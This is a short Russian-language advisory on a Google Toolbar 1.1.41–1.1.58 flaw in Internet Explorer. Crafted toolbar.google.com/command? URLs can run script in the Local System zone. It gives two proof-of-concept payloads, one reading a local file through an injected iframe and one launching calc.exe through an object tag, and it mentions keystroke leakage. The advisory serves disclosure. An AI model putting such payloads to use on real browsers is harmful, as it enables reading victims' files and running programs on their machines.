Google Toolbar - ActiveX control для Microsoft Internet Explorer, который обеспечивает функциональность поисковой системы Google. 

Обнаруженная уязвимость при посещении
определенного URL (http://toolbar.google.com/command?) позволяет изменять параметры настройки конфигурации.Уязвимость позволяет изменить конфигурацию панели инструментов,
выполнять произвольный код в пределах Local System security zone. Пример: 

1. Чтение локальных файлов: 

"http://toolbar.google.com/command? script=document.body.insertAdjacentHTML
('beforeEnd','<iframe id=oFileRead src=file://c:/test.txt></iframe>'); setTimeout(function () { alert(oFileRead.document.documentElement.innerText) },1000)"

2. Выполнение произвольных программ: 

"http://toolbar.google.com/command? script=document.body.insertAdjacentHTML
('beforeEnd','<object classid=clsid:10101010-1111-1111-1111-111111111111 codebase=c:/winnt/system32/calc.exe style=display:none></object>')".

Также сообщается, что в некоторых версиях Google keypress события посылаются основному окну браузера. Злонамеренный сценарий в текущем окне браузера может контролировать нажатие клавиш. 

Уязвимость обнаружена в Google Toolbar 1.1.41- 1.1.58.

Оставить мнение